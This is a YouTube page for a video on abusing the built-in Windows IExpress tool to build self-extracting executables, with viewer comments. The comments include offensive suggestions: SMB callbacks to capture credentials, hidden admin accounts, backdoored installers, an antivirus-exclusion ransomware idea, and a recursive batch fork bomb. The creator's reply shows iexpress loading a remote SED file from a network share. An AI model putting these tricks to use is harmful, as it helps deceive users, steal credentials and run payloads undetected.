Self-Extracting Executables for Hackers

Поделиться
HTML-код
  • Опубликовано: 29 окт 2024

Комментарии • 159

  • @trens1005
    @trens1005 Месяц назад +9

    I use to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out WPF applications on web pages to bypass security. Not as easy as it use to be with IE but still there. Also use a MSI file with resilience to re-download when the file is removed. Old as time, but works even today.

  • @Grifter
    @Grifter 2 месяца назад +20

    Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.

  • @neutrino2211_
    @neutrino2211_ 2 месяца назад +18

    With this I think I'm not just "living off the land", your computer is my Dukedom

  • @TheWeakLink101
    @TheWeakLink101 2 месяца назад +11

    "open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching RUclips tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!

  • @CU.SpaceCowboy
    @CU.SpaceCowboy 2 месяца назад +48

    literally never heard of it, great video.

    • @nyandesu9165
      @nyandesu9165 2 месяца назад +5

      wow, you must have had a sad childhood if you never went to play in system32

    • @CU.SpaceCowboy
      @CU.SpaceCowboy Месяц назад +2

      @@nyandesu9165lol not really no i had an imac as a kid not a windows. ive just never read about this particular binary. ill usually look at windir for dll sideloading and stuff by checking missing dll’s in procmon or wtv. havent explored a lot of lolbins. :D

  • @flok.7735
    @flok.7735 Месяц назад +1

    Finally the 40+min. Videos are back. I missed them. I would love more stuff like the 'Throwback Network' Videos. And no offence, but the 10-15min. Videos with 3min. Advertisements in the middle got kinda boring over the time. Lov ya, take care.❤

  • @jamesion2733
    @jamesion2733 Месяц назад +8

    How do people even find this stuff! At a addicted learner at this genre of IT, this is gold!

  • @hacking4good
    @hacking4good 2 месяца назад +2

    I ❤ living in QUANTUM time, thanks to Microsoft (and John & the researchers)

  • @adnan6041
    @adnan6041 Месяц назад

    This is golden info😊

  • @a2bros186
    @a2bros186 2 месяца назад +6

    This is some very good information, mister

  • @ebbrayezkhanzada7304
    @ebbrayezkhanzada7304 Месяц назад

    You have my attention for rest of my life

  • @BkSMedia
    @BkSMedia 2 месяца назад +8

    This is mental, I will never trust an exe ever again 🤣 Thank goodness I use Linux as a daily OS

    • @Critical3rror
      @Critical3rror Месяц назад

      Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy nilly is bad no matter the OS. The strongest anti virus is a smart user, but even they aren't infallible.

    • @EpicNoobx
      @EpicNoobx Месяц назад +2

      linux isn't immune to viruses also you dont need to mention that you use linux everywhere

  • @qw5pcnvkzghhrybb231
    @qw5pcnvkzghhrybb231 Месяц назад +2

    What an outro 😂 with the loop of calc

  • @BLiNKx86
    @BLiNKx86 2 месяца назад +2

    Love the early morning uploads! At least in California

  • @jonnyfatboy7563
    @jonnyfatboy7563 Месяц назад

    it seems like a great tool to keep in the windows install... if you are the NSA 😲

  • @autohmae
    @autohmae 2 месяца назад +2

    After I saw you can automate it, without any windows: definitely should be on the list !

  • @heatherryan9820
    @heatherryan9820 Месяц назад +2

    Would antivirus catch the iexpress instance though? Like when you first call iexpress, would antivirus throw a warning?

    • @0x4e696b
      @0x4e696b Месяц назад +2

      Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.

  • @mbashiry
    @mbashiry 2 месяца назад

    very good information

  • @siomek101
    @siomek101 2 месяца назад

    you can put the command in the gui too, its not stopping you (13:05)

  • @DjPsYcOtIc
    @DjPsYcOtIc Месяц назад

    Cheers.

  • @BLKMGK4
    @BLKMGK4 Месяц назад

    Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :)
    BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!

  • @HauthyPiyces
    @HauthyPiyces 2 месяца назад +1

    hm,that might be a problem

  • @modzgodzo
    @modzgodzo Месяц назад

    wtf John, stop please, you makin' me really anxious of everything connected to internet. :D

  • @markusTegelane
    @markusTegelane 2 месяца назад +1

    0:13 that's what they want you to think

  • @sreejith_jinachandran
    @sreejith_jinachandran Месяц назад

    From below 3 which one is efficient
    AWUS036ACM
    AWUS036ACH
    AWUS036NHA
    According to you?

  • @Sristi-Misti
    @Sristi-Misti 2 месяца назад

    Sir, Would you make videos about scammers please 🙏

    • @Sristi-Misti
      @Sristi-Misti Месяц назад

      @@romanemul1 Am I requested you? or you are a scammer?

  • @88tx
    @88tx 2 месяца назад +52

    for "hackers", specifically the skids lmao

    • @inspirationchannel101
      @inspirationchannel101 2 месяца назад +1

      Well said 😂

    • @SecGuy-v9p
      @SecGuy-v9p 2 месяца назад +4

      well, lolbins not really only being used by skiddies, several bigger threats have been using lolbins like certutil or installutils.

    • @inspirationchannel101
      @inspirationchannel101 2 месяца назад +13

      @@88tx well guess any good pen tester would use anything at their disposal even if its easy no reason to work twice the amount with the same outcome🙂

    • @isheamongus811
      @isheamongus811 2 месяца назад

      I have seen sth like that with .bat

    • @Alfred-Neuman
      @Alfred-Neuman 2 месяца назад

      Why would it be used specifically by script kids?
      People like you seems to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using a hacked norwegian satellites etc... lol

  • @lfcbpro
    @lfcbpro Месяц назад

    When you were running the .exe files, I assumed you were in Admin role, I am curious what would display on the UAC for a none Admin role?
    Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people?
    Also, I was not sure were the connection to Internet Explorer came from in the Sigcheck details?

  • @HeinrichChristiansen
    @HeinrichChristiansen Месяц назад

    Rebuilding Installer.exe from Installer.SED - Can the other way around be done too?
    Just curious

  • @WylieBayes-q9m
    @WylieBayes-q9m 2 месяца назад +1

    Damn it John. Stop burning my unknown lolbins!

  • @TangoBravo-z4p
    @TangoBravo-z4p 2 месяца назад +1

    100 percent of kids would do this on every pc in schools back in my day looooool if only we had youtube haha

  • @BangBangBang.
    @BangBangBang. Месяц назад

    You can right click on an exe and choose extract.

  • @CZghost
    @CZghost 2 месяца назад

    Definitely. After watching the video, certainly! :D

  • @darkshoxx
    @darkshoxx 2 месяца назад +4

    28:05 Tags, also known as "greater than less than symbol waka waka alligator faces" 🐊🐊

  • @darkshoxx
    @darkshoxx 2 месяца назад +9

    Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)

    • @darkshoxx
      @darkshoxx 2 месяца назад +2

      Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?

    • @88tx
      @88tx 2 месяца назад

      this thing basically just zip your files and ship it as an exe. literally any antivirus would detect it and see right through it, and only skids would use it.

    • @_JohnHammond
      @_JohnHammond  2 месяца назад +14

      Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either setup other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on And you are right that it can be extra obfuscation for deeper layers of malware of malware just as well, it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not it's generated EXE... and there is nothing stopping you from providing the file with a remote location by a SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share
      emote.SED), so it doesn't need to be on disk or depend on another file artifact.

    • @darkshoxx
      @darkshoxx 2 месяца назад +2

      @@_JohnHammond Just tried it from the same folder, yeah that works. Thanks for the explanation, yeah that all makes sense. Fascinating

  • @leahcimnaerc9543
    @leahcimnaerc9543 Месяц назад

    iexpress as a trojan is like the old comics. where the CIA use old soviet gear to perform surveillance. The old soviet gear being giant satellite dishes with giant head phones and antenna.

  • @vladimirmisata
    @vladimirmisata Месяц назад

    Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!

    • @Cyba_IT
      @Cyba_IT Месяц назад

      Go easy on the shift key bud. 😂

  • @AnonymousPhucker
    @AnonymousPhucker Месяц назад

    maybe run net user add commands on secondary options ? hefty way to have sneaked in local admin accounts ?

  • @STANSLASGANDA
    @STANSLASGANDA Месяц назад +1

    I wonder how to block that as part of Windows PC hardening🤔🤔🤔???

  • @GNUGradyn
    @GNUGradyn 2 месяца назад

    honestly this only feels useful for a script kiddy kind of thing because all of this is already trivial for actual developers, e.g. via costura

  • @AltaBross
    @AltaBross 2 месяца назад +10

    can it bypass AV by putting first Exclusion to C:\ drive then executing powershell base64 memory Ransomware

    • @yukiqt
      @yukiqt 2 месяца назад +2

      no

    • @User-kq3od
      @User-kq3od 2 месяца назад +4

      Give up kid

    • @CyphrSec
      @CyphrSec 2 месяца назад +4

      This made me laugh out loud, Ty kid

    • @cybergodca
      @cybergodca 2 месяца назад

      it doesn't really work like that 😅

    • @galsherp6173
      @galsherp6173 2 месяца назад +1

      this fixes a problem which is not there, you understand? there are 1000s ways of bundling your software, but like some other comments said: the avs can see right thru it (which is logic because its not obfuscated...

  • @Atmatan
    @Atmatan 2 месяца назад

    Yo mate, one of my machines just got hacked.
    Other than Twitter, how can I send you the logs and artifacts?
    It might be worth looking into, since you're into that stuff.

    • @Atmatan
      @Atmatan 2 месяца назад

      Nevermind. This video has what your site doesn't: the full list of links 😂

  • @ai-spacedestructor
    @ai-spacedestructor Месяц назад

    hang on, you sta5rted a bomb on your actual computer instead of a virtual machine?
    your living on the edge here!

  • @Gizmologist_
    @Gizmologist_ Месяц назад

    The duke of windows nuking

  • @darshanakhare6676
    @darshanakhare6676 2 месяца назад +2

    I would like to see this with metasploit in action but yt will not allow it right

    • @yukiqt
      @yukiqt 2 месяца назад

      youtube would allow it, it just wouldn't be very interesting

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 2 месяца назад +2

      i mean you cam use whatever you want for cnc lol, id rather use something that wont get flagged in memory or wtv like a dotnet agent, then use a beacon or meterpreter for advanced control after i have persistence

  • @seancrouch
    @seancrouch Месяц назад

    Hey can someone give me a idea of what i should price my mobile app as?? Main purpose/function is to be able to hash files and verify files on mobile already made it and works well just dont know what to price it at was thinking £2? Dont want to open source it got bills to pay, any advice or idea's are welcome

    • @robotron1236
      @robotron1236 Месяц назад

      @@seancrouch why can’t I do that on my PC? My phone is basically for calling and texting people and sometimes watching RUclips/surfing the web. If I were going to use my phone like a computer, I’d just install a Linux distro on it and have everything I could ever want for free.

  • @leahcimnaerc9543
    @leahcimnaerc9543 Месяц назад

    Using this "SED" technique. lol

  • @Jesseoreilly-ed7ft
    @Jesseoreilly-ed7ft Месяц назад

    Not really living off the land when I have to then social engineer someone to install the file or run it from within a service ive already exploited, better ways to get this done, nice way to make an installer though i guess...

  • @bolter99
    @bolter99 12 дней назад

    Windows defender instantly detected my test file lol

  • @ninjasiren
    @ninjasiren Месяц назад

    Gosh this is like that WinRAR or WinZip self-executative zip or rar files. Where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this)
    Or those stuff like NSIS or InstallShield stuff I also used abit

  • @1.1-z9d
    @1.1-z9d 2 месяца назад +3

    Sup

  • @logiciananimal
    @logiciananimal 2 месяца назад

    The wikipedia page on this is interesting. But I am trying to figure out - why does it exist? But yes, it belongs in the lolbin category.

  • @DaRaccoonCrypto
    @DaRaccoonCrypto Месяц назад

    Iexpress something the RAT kiddies used to love using to pack up the nasty RAT's. Not seen this in time surprised its not in the LOTL files.

  • @k4m1kazep1lot4
    @k4m1kazep1lot4 2 месяца назад +2

    I wonder if u can prompt a user to run on admin privilege

    • @yukiqt
      @yukiqt 2 месяца назад +1

      you can, just like you can with any exe

    • @k4m1kazep1lot4
      @k4m1kazep1lot4 2 месяца назад +1

      @@yukiqt yeah but the installer doesnt specifically ask for admin privilege

    • @yukiqt
      @yukiqt 2 месяца назад

      @@k4m1kazep1lot4 if you're asking if it can bypass uac, it can't

  • @RandomytchannelGD
    @RandomytchannelGD 2 месяца назад

    Hi

  • @cybersecurity-yo9ec
    @cybersecurity-yo9ec Месяц назад

    Bypass antivirus whith iexplorer encode payload en opera example

  • @antonioveloy9107
    @antonioveloy9107 2 месяца назад

    oh jeez, ofc thats a lolbin

  • @juliussakalys4684
    @juliussakalys4684 2 месяца назад

    yikes

  • @not_user11
    @not_user11 2 месяца назад

    I can't try it out because my pc doesn't run windows

    • @_Yassir_
      @_Yassir_ 2 месяца назад

      poor little linux user

    • @robotron1236
      @robotron1236 2 месяца назад

      Runs in WINE on linux.

    • @robotron1236
      @robotron1236 Месяц назад

      @@_Yassir_ in the words of OTW, “if you don’t know Linux, you’re not a hacker.”

    • @robotron1236
      @robotron1236 Месяц назад

      @@not_user11 I use windows stuff like this all the time. Pretty much anything old, or CLI will run with WINE. Hell, I’d say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.

  • @HyBlock
    @HyBlock 2 месяца назад +136

    41 minutes of yapping just to tell us that an installer can run whatever you tell it to.

    • @MygenteTV
      @MygenteTV 2 месяца назад +49

      You may be right about that but remember, you aren't entitled to anything and he doesn't own us anything.

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 2 месяца назад +21

      domt be a dick bud

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 2 месяца назад +17

      he literally jumped right in explained what the tool was

    • @skillato9000
      @skillato9000 2 месяца назад +5

      ​@@MygenteTV🤓

    • @rohit.vikram
      @rohit.vikram 2 месяца назад +17

      ​@HyBlock spoken like someone who doesn't understand how lolbin attacks work

  • @looweegee252
    @looweegee252 2 месяца назад +1

    Bro who you yelling at tho

    • @Cyba_IT
      @Cyba_IT Месяц назад

      He's just passionate about the subject. He doesn't yell half as much as some youtubers do.

    • @looweegee252
      @looweegee252 Месяц назад

      @@Cyba_IT I'm just trying to stay chill and learn about IT not have lunch with Samuel L Jackson 😆😆😆

    • @Cyba_IT
      @Cyba_IT Месяц назад

      @@looweegee252 😂😂😂

  • @Grumpy-Fallboy
    @Grumpy-Fallboy 2 месяца назад +3

    don't worry soon microsoft will get rid all old ~[control-panel] and other vintage [features] and stuff in windows, so u don't mess around :D

    • @seen-bc9eq
      @seen-bc9eq 2 месяца назад +1

      Update: they are not getting rid of it

    • @robotron1236
      @robotron1236 2 месяца назад

      Yup just like those .pif files too.

  • @TangoBravo-z4p
    @TangoBravo-z4p 2 месяца назад

    bro

  • @bob-p7x6j
    @bob-p7x6j 2 месяца назад

    basically first

  • @comosaycomosah
    @comosaycomosah 2 месяца назад

    lol classic

  • @OVERKILL_PINBALL
    @OVERKILL_PINBALL 2 месяца назад

    omg

  • @oxygen02
    @oxygen02 2 месяца назад

    first

  • @PeterSimon-pk9tb
    @PeterSimon-pk9tb 2 месяца назад

    Bb

  • @darkshoxx
    @darkshoxx 2 месяца назад

    twf no secret end-of-video keyword 😞

  • @sweet09876
    @sweet09876 2 месяца назад

    second

  • @gojo99998
    @gojo99998 2 месяца назад

    First 🥇

  • @VaracolacidVesci
    @VaracolacidVesci 2 месяца назад +6

    This is kind of stupid.
    Any installer maker can do this, and there are many easier to use and abuse. It is not in the lust because AN INSTALLER MAKER is known to be able to do this, it is not a design flaw or weakness.

    • @anik2443
      @anik2443 2 месяца назад +2

      This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.

    • @VaracolacidVesci
      @VaracolacidVesci 2 месяца назад

      @@anik2443 it does not matter that comes with windows. Why would it?
      Is not like YOU are making your own malware to infect yourself.
      Any bad actor can use whatever dont have to be pre-installed. That is why it is stupud

    • @anik2443
      @anik2443 2 месяца назад +1

      @@VaracolacidVesci do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go Research about it

    • @VaracolacidVesci
      @VaracolacidVesci 2 месяца назад

      @@anik2443 hahahaha ofc not! You are trying to sound fancy but clearly you are just another asshole in the internet.
      it's not like the av engines or any other software would say OH it is made by the system tool, let's allow it!.
      hahaha how stupid can you be

    • @VaracolacidVesci
      @VaracolacidVesci 2 месяца назад

      @@anik2443 hahahaha OFC NOT!
      There is nothing special about it being on the system, is not like the exe would have anything special about it. is not like the AV engines or any other protection would say, OH it is made by the system tool let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?

  • @RyanGForcE-xo9zx
    @RyanGForcE-xo9zx 2 месяца назад +1

    Bring game hacking *🎉❤

  • @Alaz21
    @Alaz21 2 месяца назад

    First 😂

  • @mineyoucraftube1768
    @mineyoucraftube1768 2 месяца назад

    i remember pranking my friends with a .bat file (named hello.bat) containing:
    start hello.bat
    call hello.bat
    very funny, unless you have unsaved work
    (unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)

  • @mikeonthecomputer
    @mikeonthecomputer Месяц назад

    Instructions unclear. Typing does nothing on my Windows 95 computer's start menu.